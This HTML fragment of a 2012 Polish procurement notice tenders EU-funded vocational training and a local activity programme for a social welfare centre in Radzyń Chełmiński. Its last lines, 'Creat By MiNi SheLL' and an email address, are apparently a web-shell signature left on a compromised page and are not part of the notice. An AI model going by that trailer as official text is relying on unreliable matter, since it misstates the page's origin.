<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, jeżeli uprawnienie do zlożenia oferty nie wynika z odpisu właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie możliwości zmian w harmonogramie szkoleń-kursów wynikających z ewentualnych zmian w Projekcie systemowym pn. Aktywna integracja w Radzyniu Chełmińskim. Ponadto Zamawiający zastrzega sobie możliwość zmiany liczby uczestników szkolenia oraz rodzajów szkoleń spośród objętych SIWZ  lub rezygnację z danego szkolenia-kursu. Nie przewiduje się możliwości wzrostu cen przedstawionych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.radzynchelminski.pl/461,ogloszenia-o-przetargach-zamóweinia-publiczne-2012-rok.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Radzyniu Chełmińskim
ul. Plac Towarzystwa Jaszczurczego 9
87-220 Radzyń Chełmiński.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2012 godzina 10:30, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Radzyniu Chełmińskim
ul. Plac Towarzystwa Jaszczurczego 9
87-220 Radzyń Chełmiński.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Cykl szkoleniowy współfinansowany jest ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet Nr VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi szkoleniowe dla osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja w Radzyniu Chełmińskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1 Kurs Spawanie metodą MAG; 135h,w tym 120h praktycznych dla 5 mężczyzn, Program szkolenia powinien być zgodny z wytycznymi Instytutu Spawalnictwa z Gliwic. Kurs musi się zakończyć egzaminem państwowym przed Egzaminatorem z Instytutu Spawalnictwa z Gliwic. Rodzaj dokumentów wydanych po zakończeniu kursu i pozytywnym zaliczeniu egzaminu: Książka Spawacza i Certyfikat, wystawione przez Instytut Spawalnictwa z Gliwic.
Wykonawca musi posiadać aktualny ATEST Instytutu Spawalnictwa z Gliwic na prowadzenie szkoleń dla spawaczy.
1.2 Kurs Kierowca wózków jezdniowych wraz z Obsługą stacji LPG dla 2 osób  
Liczba 67 godz. zajęć wózki jezdniowe (teoria i praktyka w tym 47 godzin zajęć teoretycznych, 1 godz. zajęć teoretycznych odpowiada godzinie lekcyjnej = 45 minut 1 godz. zajęć praktycznych odpowiada godzinie zegarowej = 60 minut) Liczba godzin 30 godz. (teoria i praktyka) obsługa stacji LPG.
Kurs Kierowca wózków jezdniowych powinien być przeprowadzony na podstawie programu szkolenia zatwierdzonego przez Ośrodek Doskonalenia Kadr z Mysłowic.
Kurs Obsługa stacji LPG powinien być przeprowadzony na podstawie programu szkolenia zatwierdzonego przez Transportowy Dozór Techniczny.
Rodzaj dokumentów wydanych po zakończeniu szkolenia Kierowca wózków jezdniowych: Zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Rodzaj dokumentów wydanych po zakończeniu szkolenia Obsługa stacji LPG: Zaświadczenie kwalifikacyjne wystawione przez Transportowy Dozór Techniczny.
1.3 Kurs: Operator żurawi wieżowych; 100h, w tym 60 prakt. dla 2 mężczyzn,
Kurs powinien być prowadzony na podstawie programu zatwierdzonego przez Urząd Dozoru Technicznego. Rodzaj dokumentów wydanych po zakończeniu szkolenia: Zaświadczenie kwalifikacyjne wystawione przez Urząd Dozoru Technicznego.
1.4 Kurs: Montażysta rusztowań budowlano-montażowych metalowych ; 80h dla 2 mężczyzn. Kurs powinien być prowadzony na podstawie programu opracowanego przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego z Warszawy, zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r., w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263). Wykonawca musi posiadać aktualne Potwierdzenie z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego z Warszawy na prowadzenie szkoleń w wyżej wymienionym zakresie.
1.5 Kurs profesjonalny sprzedawca (łącznie 160 godz. w tym 80 godz. praktyka ), z modułami podstawowych zagadnień higieny, obsługą kas i urządzeń fiskalnych z obsługą komputera i bezpieczeństwo i higiena pracy  - 5 kobiet
Liczba godzin łącznie 160 (teoria i praktyka). 
Kurs powinien obejmować następujące zagadnienia: skuteczne techniki sprzedaży, standardy obsługi klienta, negocjacje handlowe. Praktyki zawodowe powinny odbywać w odpowiednich miejscach dla tego rodzaju kursu. 
Program szkolenia powinien być zgodny z przepisami obowiązującego prawa i zatwierdzony przez Zamawiającego. 
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
1.6 Kurs: Opiekunka osób starszych: moduł teoretyczny i praktyczny w instytucjach pomocy społecznej  np. DPS 
Liczba  godzin 180 godz. - 5 osób w tym zajęcia teoretyczne 120 godzin, zajęcia praktyczne 60 godzin, przy czym 1 godz. zajęć teoretycznych odpowiada godzinie lekcyjnej = 45 minut, 1 godz. zajęć praktycznych odpowiada godzinie zegarowej = 60 minut. 
-Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu. Wykonawca zapewni i przeprowadzi stosowne badania lekarskie potwierdzające brak przeciwwskazań do odbycia kursu i późniejszego wykonywania zawodu.
 -W ramach zajęć teoretycznych wykonawca zapewni każdemu kursantowi materiały szkoleniowe na własność obejmujące zagadnienia danego kursu w tym teczka A4, notatnik, długopis, ołówek, skrypt lub książka zgodna ze specyfikacja danego kursu.
- Wykonawca zapewni uczestnikom kursu na własność odzież ochronną oraz środki higieny (fartuch, rękawiczki jednorazowe, środki czystości w tym mydło, ręcznik, proszek).
- Program szkolenia powinien zawierać m.in. następujące zagadnienia: psychologiczne i pedagogiczne uwarunkowania pracy z osobami starszymi, chorymi i niepełnosprawnymi, wykonywanie czynności higienicznych przy podopiecznym, wspieranie biologicznych funkcji życiowych podopiecznego, udzielanie pierwszej pomocy przedmedycznej (w wymiarze 16 godzin zegarowych), organizowanie czasu podopiecznemu, praktyka w placówce opiekuńczej w wymiarze, 60 godzin. 
-Pozostałe warunki, które Zamawiający musi zaakceptować chcąc przystąpić do udzielenia zamówienia zawarte są we wzorze umowy.
1.7 Kurs Manicure i paznokci  16 godz. i 40 godz. praktyki oraz kurs Wizaż i autoprezentacja  40 godz. dla 2 kobiet
Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu.
1.8  Kurs; Kadry i płace-księgowość;, kadry- 60h, księgowość 100h dla 2 Kobiet;
-Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu.
1.9 Kurs: Florystyka-bukieciarstwo; 40h teorii i 80h praktyki dla 2 Kobiet.
- Celem kursu jest teoretyczne i praktyczne przygotowanie osób szkolonych do pracy w zawodzie zgodnym z tematyką kursu.
- Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu. W ramach zajęć teoretycznych wykonawca zapewni każdemu kursantowi materiały szkoleniowe na własność obejmujące zagadnienia danego kursu w tym teczka A4, notatnik, długopis, ołówek, skrypt lub książka zgodna ze specyfikacja danego kursu.
- Poprzez zajęcia praktyczne Zamawiający rozumie pracę z żywymi  kwiatami, ćwiczenia i praktykę przy wykonywaniu różnych kompozycji. Wykonane kompozycje kwiatowe przechodzą na własność Zamawiającego. 
- Zamawiający dopuszcza  max. 16 godzin  zajęć praktycznych w kwiaciarniach. W jednej kwiaciarni max 2 uczestników kursu.
- Wykonawca zapewni materiały i narzędzia do prowadzenia zajęć praktycznych (naczynia, pojemniki, kosze, wstążki, rafia, stożki, siatki, druty, nici, taśmy, nożyce, cęgi i sekatory, klej, pistolet do kleju, spryskiwacze, preparaty przedłużające trwałość kwiatów, papier, folie ozdobne, kora, kwiaty cięte, kwiaty sztuczne, elementy ozdobne) w takiej ilości, aby na każdy uczestnik kursu mógł samodzielnie wykonywać prace. 
- Pozostałe warunki, które Zamawiający musi zaakceptować chcąc przystąpić do udzielenia zamówienia zawarte są we wzorze umowy.
1.10 Zajęcia z doradcą zawodowym  -  27  osób
Liczba godzin 30 h na jednego uczestnika (25 godz. zajęć grupowych  i 5 godz. indywidualnych  dla każdego uczestnika  w zakresie aktywnego poszukiwania pracy.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). 
1.11 ) Trening kompetencji i umiejętności społecznych zajęcia z psychologiem-  27  osób. Liczna godzin  30 h na jednego uczestnika (25 godz. zajęć grupowych  i 5 godz. indywidualnych  dla każdego uczestnika).  
Wydawane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi w zakresie realizacji Programu Aktywności Lokalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie realizacji Programu Aktywności Lokalnej (PAL) dla osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja w Radzyniu Chełmińskim, cykl działań dla 8 kobiet oraz ich rodzin/otoczenia - maksymalna liczba dzieci biorących udział we wszystkich spotkaniach (nie tylko wyjazdowych) wynosi 19. Podczas zajęć należy zapewnić dzieciom opiekę i catering.
 Program Aktywności Lokalnej składa się z:
a)  Asertywność treningi kompetencji i umiejętności społecznych,  wiadomości na temat zachowań asertywnych, rozpoznawanie swego zachowania, mechanizmów nacisku grupowego. W trakcie spotkania dzieci będą uczestniczyły w zajęciach pod okiem opiekunki. (min 8 godz. zajęć grupowych)
b) Efektywne radzenie sobie ze stresem - rozumienie zjawisko stresu psychicznego i jego wpływu na zdrowie człowieka, poznanie własnego stylu reagowania na stres, zdolność do rozpoznawania źródeł stresu, rozwój umiejętności radzenia sobie ze stresem (dzieci będą brały udział w zajęciach) (min. 8 godz. zajęć grupowych)
c) Radzenie sobie ze złością - źródła złości,  konstruktywne sposoby radzenia sobie ze złością (dla dzieci zajęcia) (min.  8 godz. zajęć grupowych) 
d) Autoprezentacja umiejętność oceny własnych możliwości i kompetencji oraz umiejętność korzystnej autoprezentacji.  (min. 8 godz.zajęć grupowych 
e) Warsztat: Zdrowe życie (min. 10 godz., zajęć grupowych wyjazdowy); 
f) Sesja Jak być rodzicem, jak radzić sobie z wychowaniem dzieci, z zakresu kompetencji rodzicielskich (wyjazd, min. 10 godz. zajęć; pedagog-terapeuta - zajęcia grupowe), obserwacja interakcji między rodzicami i dziećmi, porady - poradnictwo i wsparcie indywidualne oraz grupowe  w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych.
g)  warsztat Aktywne formy poszukiwania pracy (min. 6 godz., trener pracy. zajęcia grupowe).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com